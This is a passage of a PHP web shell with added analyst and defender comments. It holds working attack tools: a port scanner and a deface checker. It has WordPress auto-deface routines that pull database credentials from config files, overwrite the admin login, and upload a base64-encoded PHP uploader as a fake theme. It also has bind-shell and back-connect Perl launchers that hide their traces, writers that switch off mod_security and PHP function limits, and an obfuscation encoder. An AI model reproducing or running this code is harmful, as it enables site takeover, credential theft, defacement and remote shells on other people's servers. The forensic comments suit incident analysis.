  2430.         $start = strip_tags($_POST['start']);
  2431.         $end = strip_tags($_POST['end']);
  2432.         $host = strip_tags($_POST['host']);
  2433.         for($i = $start; $i<=$end; $i++){
  2434.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  2435.             if($fp){
  2436.                 echo 'Port '.$i.' is <font color=green>open</font><br>';
  2437.             }
  2438.             flush();
  2439.         }
  2440.     } else {
  2441.         echo '<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  2442.              <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  2443.              <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  2444.              Host: <input type="text" name="host" value="localhost"/><br /><br />
  2445.              Port start: <input type="text" name="start" value="0"/><br /><br />
  2446.              Port end:<input type="text" name="end" value="5000"/><br /><br />
  2447.              <input type="submit" value="Scan Ports" />
  2448.              </form></center><br /><br />';
  2449.     echo '</div></table></td>';
  2450.  
  2451. }
  2452. }elseif($_GET['do'] == 'fake_root') {
  2453.     ob_start();
  2454.     $cwd = getcwd();
  2455.     $ambil_user = explode("/", $cwd);
  2456.     $user = $ambil_user[2];
  2457.     if($_POST['reverse']) {
  2458.         $site = explode("\r\n", $_POST['url']);
  2459.         $file = $_POST['file'];
  2460.         foreach($site as $url) {
  2461.             $cek = getsource("$url/~$user/$file");
  2462.             if(preg_match("/hacked/i", $cek)) {
  2463.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
  2464.             }
  2465.         }
  2466.     } else {
  2467.         echo "<center><form method='post'>
  2468.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  2469.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  2470.         Domain: <br>
  2471.         <textarea style='width: 450px; height: 250px;' name='url'>";
  2472.         reverse($_SERVER['HTTP_HOST']);
  2473.         echo "</textarea><br>
  2474.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  2475.         </form><br>
  2476.         Note: Before using this tool , first upload your deface file on dir /home/user/ dan /home/user/public_html.</center>";
  2477.     }
  2478. } elseif($_GET['do'] == 'adminer') {
  2479.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2480.     function adminer($url, $isi) {
                // Downloads $url with cURL, with CURLOPT_FILE set to a handle opened for
                // writing on the local path $isi, and returns the result of curl_exec().
                // Analyst note: the only caller in this branch passes the Adminer 4.2.4
                // download URL and "adminer.php", so an adminer.php in the script's working
                // directory is an artefact of this feature and belongs in the incident scope.
  2481.         $fp = fopen($isi, "w");
  2482.         $ch = curl_init();
  2483.               curl_setopt($ch, CURLOPT_URL, $url);
  2484.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2485.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                // Peer certificate verification is switched off, so the downloaded file is
                // not authenticated against the origin server.
  2486.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2487.               curl_setopt($ch, CURLOPT_FILE, $fp);
                // The function returns on the next line; the curl_close(), fclose() and
                // flush calls that follow it are never reached.
  2488.         return curl_exec($ch);
  2489.               curl_close($ch);
  2490.         fclose($fp);
  2491.         ob_flush();
  2492.         flush();
  2493.     }
  2494.     if(file_exists('adminer.php')) {
  2495.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2496.     } else {
  2497.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2498.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2499.         } else {
  2500.             echo "<center><font color=red>Failed buat file adminer</font></center>";
  2501.         }
  2502.     }
  2503. } elseif($_GET['do'] == 'auto_dwp') {
  2504.     if($_POST['auto_deface_wp']) {
  2505.         function anucurl($sites) {
                    // Requests the URL in $sites with cURL and returns the response body
                    // (CURLOPT_RETURNTRANSFER), following redirects, with a 5 second
                    // connect timeout. Declared inside the auto_deface_wp POST branch, so it
                    // exists only while that branch runs.
  2506.             $ch = curl_init($sites);
  2507.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2508.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    // Detection note: the User-Agent is a fixed string, so outbound requests
                    // from this helper carry the same value in the receiving site's logs.
  2509.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2510.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                    // Both TLS checks (peer certificate and host name) are disabled.
  2511.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2512.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                    // Forensic note: cookies are read from and written to a relative path,
                    // 'cookie.txt', i.e. a file in the script's working directory.
  2513.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2514.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2515.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2516.             $data = curl_exec($ch);
  2517.                   curl_close($ch);
  2518.             return $data;
  2519.         }
  2520.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
                    // Sends an HTTP POST to $cek carrying the form fields built below and
                    // returns the response body. The caller in this branch passes
                    // "$target/wp-login.php" as $cek, so this is a scripted login request.
                    // $web is sent as redirect_to; $wp_submit is the submit-button value the
                    // caller extracted from a previously fetched page.
  2521.             $post = array(
  2522.                    "log" => "$userr",
  2523.                    "pwd" => "$pass",
  2524.                    "rememberme" => "forever",
  2525.                    "wp-submit" => "$wp_submit",
  2526.                    "redirect_to" => "$web",
  2527.                    "testcookie" => "1",
  2528.                    );
  2529.             $ch = curl_init($cek);
  2530.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2531.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    // Detection note: same fixed User-Agent string as anucurl(); a login
                    // POST with this value, especially one originating from the web server
                    // itself, is worth correlating in access logs.
  2532.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                    // TLS peer and host verification are both disabled.
  2533.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2534.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2535.                   curl_setopt($ch, CURLOPT_POST, 1);
  2536.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                    // Session cookies are persisted to the relative file 'cookie.txt', which
                    // the other requests in this branch reuse.
  2537.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2538.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2539.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2540.             $data = curl_exec($ch);
  2541.                   curl_close($ch);
  2542.             return $data;
  2543.         }
  2544.         $scan = $_POST['link_config'];
  2545.         $link_config = scandir($scan);
  2546.         $script = htmlspecialchars($_POST['script']);
  2547.         $user = "MHM";
  2548.         $pass = "MHM";
  2549.         $passx = md5($pass);
  2550.         foreach($link_config as $dir_config) {
  2551.             if(!is_file("$scan/$dir_config")) continue;
  2552.             $config = file_get_contents("$scan/$dir_config");
  2553.             if(preg_match("/WordPress/", $config)) {
  2554.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  2555.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  2556.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2557.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  2558.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2559.                 $prefix = $dbprefix."users";
  2560.                 $option = $dbprefix."options";
  2561.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2562.                 $db = mysql_select_db($dbname);
  2563.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2564.                 $result = mysql_fetch_array($q);
  2565.                 $id = $result[ID];
  2566.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2567.                 $result2 = mysql_fetch_array($q2);
  2568.                 $target = $result2[option_value];
  2569.                 if($target == '') {                
  2570.                     echo "[-] <font color=red>error, cant take the domain name</font><br>";
  2571.                 } else {
  2572.                     echo "[+] $target <br>";
  2573.                 }
  2574.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2575.                 if(!$conn OR !$db OR !$update) {
  2576.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2577.                     mysql_close($conn);
  2578.                 } else {
  2579.                     $site = "$target/wp-login.php";
  2580.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  2581.                     $b1 = anucurl($site2);
  2582.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2583.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2584.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2585.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2586.                     $www = "m.php";
  2587.                     $fp5 = fopen($www,"w");
  2588.                     fputs($fp5,$upload3);
  2589.                     $post2 = array(
  2590.                             "_wpnonce" => "$anu2",
  2591.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2592.                             "themezip" => "@$www",
  2593.                             "install-theme-submit" => "Install Now",
  2594.                             );
  2595.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2596.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2597.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2598.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2599.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2600.                           curl_setopt($ch, CURLOPT_POST, 1);
  2601.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2602.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2603.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2604.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2605.                     $data3 = curl_exec($ch);
  2606.                           curl_close($ch);
  2607.                     $y = date("Y");
  2608.                     $m = date("m");
  2609.                     $namafile = "id.php";
  2610.                     $fpi = fopen($namafile,"w");
  2611.                     fputs($fpi,$script);
  2612.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2613.                            curl_setopt($ch6, CURLOPT_POST, true);
  2614.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2615.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2616.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2617.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2618.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2619.                     $postResult = curl_exec($ch6);
  2620.                            curl_close($ch6);
  2621.                     $as = "$target/k.php";
  2622.                     $bs = anucurl($as);
  2623.                     if(preg_match("#$script#is", $bs)) {
  2624.                         echo "[+] <font color='white'>managed tepes...</font><br>";
  2625.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2626.                         } else {
  2627.                         echo "[-] <font color='red'>Failed tepes...</font><br>";
  2628.                         echo "[!!] coba aja manual: <br>";
  2629.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2630.                         echo "[+] username: <font color=white>$user</font><br>";
  2631.                         echo "[+] password: <font color=white>$pass</font><br><br>";    
  2632.                         }
  2633.                     mysql_close($conn);
  2634.                 }
  2635.             }
  2636.         }
  2637.     } else {
  2638.         echo "<center><h1>WordPress Auto Deface</h1>
  2639.         <form method='post'>
  2640.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2641.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Ameer_Awwad & MHM' required><br>
  2642.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2643.         </form>
  2644.         <br><span>Note: Tools will workif you run it in folder of <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2645.         </center>";
  2646.     }
  2647. } elseif($_GET['do'] == 'auto_dwp2') {
  2648.     if($_POST['auto_deface_wp']) {
  2649.         function anucurl($sites) {
                    // Fetches the URL in $sites with cURL and returns the response body,
                    // following redirects, with a 5 second connect timeout. In this branch it
                    // is also the helper used to retrieve each URL from the submitted 'link'
                    // list before the response is parsed for DB_* settings.
  2650.             $ch = curl_init($sites);
  2651.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2652.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    // Detection note: hard-coded User-Agent, identical on every request this
                    // helper makes.
  2653.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2654.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
                    // Certificate and host-name verification are turned off.
  2655.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2656.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
                    // Forensic note: the cookie store is the relative file 'cookie.txt' in the
                    // script's working directory.
  2657.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2658.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2659.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2660.             $data = curl_exec($ch);
  2661.                   curl_close($ch);
  2662.             return $data;
  2663.         }
  2664.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
                    // POSTs the login form fields assembled below to $cek and returns the
                    // response body. The caller in this branch supplies "$target/wp-login.php"
                    // as $cek and the theme-upload admin page as $web (sent as redirect_to).
  2665.             $post = array(
  2666.                    "log" => "$userr",
  2667.                    "pwd" => "$pass",
  2668.                    "rememberme" => "forever",
  2669.                    "wp-submit" => "$wp_submit",
  2670.                    "redirect_to" => "$web",
  2671.                    "testcookie" => "1",
  2672.                    );
  2673.             $ch = curl_init($cek);
  2674.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2675.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
                    // Detection note: the User-Agent below is constant, so a login POST
                    // bearing it can be matched in the target site's access logs.
  2676.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                    // TLS peer and host verification are both disabled.
  2677.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2678.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2679.                   curl_setopt($ch, CURLOPT_POST, 1);
  2680.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
                    // The authenticated session is kept in the relative file 'cookie.txt' and
                    // picked up by later requests in the same branch.
  2681.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2682.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2683.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2684.             $data = curl_exec($ch);
  2685.                   curl_close($ch);
  2686.             return $data;
  2687.         }
  2688.         $link = explode("\r\n", $_POST['link']);
  2689.         $script = htmlspecialchars($_POST['script']);
  2690.         $user = "MHM";
  2691.         $pass = "MHM";
  2692.         $passx = md5($pass);
  2693.         foreach($link as $dir_config) {
  2694.             $config = anucurl($dir_config);
  2695.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  2696.             $dbuser = ambilkata($config,"DB_USER', '","'");
  2697.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2698.             $dbname = ambilkata($config,"DB_NAME', '","'");
  2699.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2700.             $prefix = $dbprefix."users";
  2701.             $option = $dbprefix."options";
  2702.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2703.             $db = mysql_select_db($dbname);
  2704.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2705.             $result = mysql_fetch_array($q);
  2706.             $id = $result[ID];
  2707.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2708.             $result2 = mysql_fetch_array($q2);
  2709.             $target = $result2[option_value];
  2710.             if($target == '') {                
  2711.                 echo "[-] <font color=red>error, cant take the domain name</font><br>";
  2712.             } else {
  2713.                 echo "[+] $target <br>";
  2714.             }
  2715.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2716.             if(!$conn OR !$db OR !$update) {
  2717.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2718.                 mysql_close($conn);
  2719.             } else {
  2720.                 $site = "$target/wp-login.php";
  2721.                 $site2 = "$target/wp-admin/theme-install.php?upload";
  2722.                 $b1 = anucurl($site2);
  2723.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2724.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2725.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2726.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2727.                 $www = "m.php";
  2728.                 $fp5 = fopen($www,"w");
  2729.                 fputs($fp5,$upload3);
  2730.                 $post2 = array(
  2731.                         "_wpnonce" => "$anu2",
  2732.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2733.                         "themezip" => "@$www",
  2734.                         "install-theme-submit" => "Install Now",
  2735.                         );
  2736.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2737.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2738.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2739.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2740.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2741.                       curl_setopt($ch, CURLOPT_POST, 1);
  2742.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2743.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2744.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2745.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2746.                 $data3 = curl_exec($ch);
  2747.                       curl_close($ch);
  2748.                 $y = date("Y");
  2749.                 $m = date("m");
  2750.                 $namafile = "id.php";
  2751.                 $fpi = fopen($namafile,"w");
  2752.                 fputs($fpi,$script);
  2753.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2754.                        curl_setopt($ch6, CURLOPT_POST, true);
  2755.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2756.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2757.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2758.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2759.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  2760.                 $postResult = curl_exec($ch6);
  2761.                        curl_close($ch6);
  2762.                 $as = "$target/k.php";
  2763.                 $bs = anucurl($as);
  2764.                 if(preg_match("#$script#is", $bs)) {
  2765.                     echo "[+] <font color='white'>managed tepes...</font><br>";
  2766.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2767.                     } else {
  2768.                     echo "[-] <font color='red'>Failed tepes...</font><br>";
  2769.                     echo "[!!] coba aja manual: <br>";
  2770.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2771.                     echo "[+] username: <font color=white>$user</font><br>";
  2772.                     echo "[+] password: <font color=white>$pass</font><br><br>";    
  2773.                     }
  2774.                 mysql_close($conn);
  2775.             }
  2776.         }
  2777.     } else {
  2778.         echo "<center><h1>WordPress Auto Deface V.2</h1>
  2779.         <form method='post'>
  2780.         Link Config: <br>
  2781.         <textarea name='link' placeholder='http://target.com/MYS_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  2782.         <input type='text' name='script' height='10' size='50' placeholder='Hacked by Ameer_Awwad & MHM ' required><br>
  2783.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2784.         </form></center>";
  2785.     }
  2786. } elseif(isset($_GET['do']) && ($_GET['do'] == 'reverse')){
  2787. ?>
  2788. <br>
  2789. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'>[ Reverse IP Lookup ] </a></center>
  2790. <br>
  2791. <?php
  2792. } elseif($_GET['do'] == 'network') {
            // Analyst note: the 'network' action prints two forms (bind port / back connect). On submit
            // it writes base64-decoded data to a Perl file under /tmp and starts it in the background
            // through exe() (defined outside this excerpt; presumably a shell-command wrapper).
            // Defender view: perl running as a child of the web server / PHP process, short-lived
            // /tmp/bp.pl and /tmp/bc.pl files, and new listening sockets or outbound connections owned
            // by the web server account are the signals to hunt for.
  2793.     echo "<form method='post'>
  2794.     <u>Bind Port:</u> <br>
  2795.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  2796.     <input type='submit' name='sub_bp' value='>>'>
  2797.     </form>
  2798.     <form method='post'>
  2799.     <u>Back Connect:</u> <br>
  2800.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  2801.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  2802.     <input type='submit' name='sub_bc' value='>>'>
  2803.     </form>";
  2804.     $bind_port_p="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";
            // $_POST['port_bind'] goes into the command string without validation or escaping.
            // The script file is unlinked one second after launch, so a later disk scan will not find it;
            // process-creation and socket telemetry are the durable evidence.
  2805.     if(isset($_POST['sub_bp'])) {
  2806.         $f_bp = fopen("/tmp/bp.pl", "w");
  2807.         fwrite($f_bp, base64_decode($bind_port_p));
  2808.         fclose($f_bp);
  2809.  
  2810.         $port = $_POST['port_bind'];
  2811.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  2812.         sleep(1);
  2813.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  2814.         unlink("/tmp/bp.pl");
  2815.     }
  2816.     $back_connect_p="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";
            // Same write / run / unlink pattern with /tmp/bc.pl; $_POST['ip_bc'] and $_POST['port_bc']
            // are passed to the command line as-is. Default-deny egress filtering on web servers limits
            // what a process started this way can reach.
  2817.     if(isset($_POST['sub_bc'])) {
  2818.         $f_bc = fopen("/tmp/bc.pl", "w");
  2819.         fwrite($f_bc, base64_decode($bind_connect_p));
  2820.         fclose($f_bc);
  2821.  
  2822.         $ipbc = $_POST['ip_bc'];
  2823.         $port = $_POST['port_bc'];
  2824.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  2825.         sleep(1);
  2826.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  2827.         unlink("/tmp/bc.pl");
  2828.     }
  2829. } elseif($_GET['do'] == 'csrf') {
  2830. ?>      <html>
  2831. <title>CSRF EXPLOITER ONLINE</title>
  2832. <center><br><br><br><br>
  2833. <font color=white>*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
  2834. <center>
  2835. <form method="post">
  2836. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  2837. POST File: <input type="text" name="pf" size="50" height="10" placeholder="See above^" style="margin: 5px auto; padding-left: 5px;" required><br>
  2838. <input type="submit" name="d" value="Lock!">
  2839. </form>
  2840. <?php
  2841. //gak penting
  2842.      @$url = $_POST['url'];
  2843.      @$pf = $_POST['pf'];
  2844.      @$d = $_POST['d'];
  2845. if($d) {
  2846.     //baccod
  2847.    
  2848.     echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload Cok!'></form";
  2849. }
  2850. ?>
  2851. </form>
  2852. </html>
  2853. <?php
  2854.  
  2855. }
  2856. function parah($pastebin, $nama_file){
            // Reads the content at $pastebin with file_get_contents() and writes it to the path in
            // $nama_file; neither call is checked for failure. No caller is visible in this excerpt.
            // Defender view: when $pastebin is a URL this depends on allow_url_fopen; turning that
            // setting off and blocking outbound HTTP from web servers removes the fetch-to-disk path.
  2857.     $usa = file_get_contents("$pastebin");
  2858.     $frr = fopen("$nama_file", 'w');
  2859.     fwrite($frr, $usa);
  2860. }
  2861. if($_GET['do'] == 'bypass'){
                // Analyst note: the 'bypass' action writes either a php.ini (disable_functions=none,
                // safe_mode = Off) or an .htaccess (mod_security filter directives set to Off) using
                // relative paths, i.e. into the script's working directory. echo fwrite(...) prints the
                // number of bytes written.
                // Defender view: hunt for php.ini / .htaccess files inside web-content directories that
                // contain these strings. Per-directory overrides only work where the server allows them,
                // so AllowOverride None and a server-level PHP configuration take this lever away.
  2862.         echo "<center>";
  2863.         echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  2864.         if(isset($_POST['ini']))
  2865. {
  2866.         $file = fopen("php.ini","w");
  2867.         echo fwrite($file,"disable_functions=none
  2868. safe_mode = Off
  2869.     ");
  2870.         fclose($file);
  2871.         echo "<a href='php.ini'>click here!</a>";
  2872. }       if(isset($_POST['htce']))
  2873. {
  2874.         $file = fopen(".htaccess","w");
  2875.         echo fwrite($file,"<IfModule mod_security.c>
  2876. SecFilterEngine Off
  2877. SecFilterScanPOST Off
  2878. </IfModule>
  2879.     ");
  2880.         fclose($file);
  2881.         echo "htaccess successfully created!";
  2882. }
  2883.         echo"</center>";
  2884. } elseif($_GET['do'] == 'endec') {
  2885. $text = $_POST['code'];
  2886. echo "<center>
  2887. <form method='post'><br>
  2888. <textarea placeholder='ENTER THE TEXT THAT WANT TO ENCRYPT / DECRYPT' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
  2889. <select class='inputz' size='1' name='ope'>
  2890. <option value='urlencode'>url</option>
  2891. <option value='json'>json</option>
  2892. <option value='ur'>convert_uu</option>
  2893. <option value='base64'>Base64</option>
  2894. <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  2895. <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
  2896. <option value='coeg'>gzinflate - base64</option>
  2897. <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
  2898. <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
  2899. <option value='str2'>str_rot13 - base64</option>
  2900. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  2901. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  2902. <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 -  base64</option>
  2903. <option value='gzpress'>gzcompress - base64</option>
  2904. </select><br>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  2905. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  2906. </form>";
  2907. $submit = $_POST['submit'];
  2908. if (isset($submit)){
  2909. $op = $_POST["ope"];
  2910. switch ($op) {case 'base64': $codi=base64_encode($text);
  2911. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2912. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  2913. break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
  2914. break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
